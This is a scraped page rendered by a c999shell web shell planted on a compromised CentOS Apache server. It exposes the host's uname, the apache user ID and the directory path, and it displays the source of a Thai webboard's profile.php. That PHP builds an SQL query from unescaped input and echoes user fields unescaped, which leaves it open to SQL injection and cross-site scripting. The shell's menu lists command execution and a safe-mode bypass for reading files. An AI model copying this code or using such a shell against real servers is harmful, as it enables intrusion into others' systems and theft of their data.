Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/webboard/ drwxr-xr-x |
Viewing file: profile.php (2.73 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <? include("config.inc.php"); include("header.php"); // ติดต่อ database เพื่ออ่านข้อมูล mysql_connect($host,$user,$passwd); $sql = "select * from webboard_member where User='$Name'"; $result = mysql_db_query($dbname,$sql); $NRow = mysql_num_rows($result); if($NRow==0) { echo "Error"; exit(); } $row = mysql_fetch_array($result); // กำหนดค่าตัวแปร เพื่อนำไปแสดง $User = $row["User"]; $Email = $row["Email"]; $ICQ = $row["ICQ"]; $WebName = $row["WebName"]; $URL = $row["URL"]; $Profile = $row["Profile"]; ?> <html> <head> <title><?echo $title?></title> <link href="./style.css" rel="stylesheet" type="text/css"> </head> <body bgcolor=#FFFFE0 background="img/bg2.gif"> <center> <br> <table border=0 width=60% bgcolor=blue bordercolor=blue cellspacing=0 cellpadding=0> <tr> <td align=center bgcolor=#0099FF> <font size=3 color=#FFF5EE><b>ข้อมูลสมาชิก</b></font> </td> </tr> <tr><td> <table border=1 width=100% bgcolor=white bordercolor=#0099FF cellspacing=0 cellpadding=0> <tr> <td align=left width=25%>Username</td> <td align=left> <?echo $User;?> </td> </tr> <tr> <td>Email</td> <td> <? // เลือกระบบการส่งอีเมล์ switch ($s_mail) { case "1" : echo "<a href=\"mail2me.php?wemail=$Email&name=$Name&question=$Question\" target=\"mail2me$No\">$Email</a> \n"; break; case "2" : echo "<a href=mailto:$Email>$Email</a> \n"; break; default : echo "<a href=\"mail2me.php?wemail=$Email&name=$Name&question=$Question\" target=\"mail2me\">$Email</a> \n"; } ?> </td> </tr> <tr> <td>ICQ</td> <td> <? if($ICQ) { echo "$ICQ <img src=\"http://online.mirabilis.com/scripts/online.dll?icq=$ICQ&img=$ICQ_Image_Type"."online.gif\" alt='ICQ - $ICQ'>\n"; } else { echo "--"; } ?> </td> </tr> <tr> <td>Web Name</td> <td> <? if(!$WebName) { echo "--"; } echo $WebName; ?> </td> </tr> <tr> <td>URL</td> <td> <? if($URL!="http://") { echo "<a href=\"$URL\" target=\"$URL\">$URL</a>"; } else { echo "--"; } ?> </td> </tr> <tr> <td>Profile</td> <td><? if($Profile!='') { echo " \t$Profile"; } else{ echo "--"; } ?></td> </tr> </table> </table> <br><br> <hr color=1E90FF width=60%> </center> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0047 ]-- |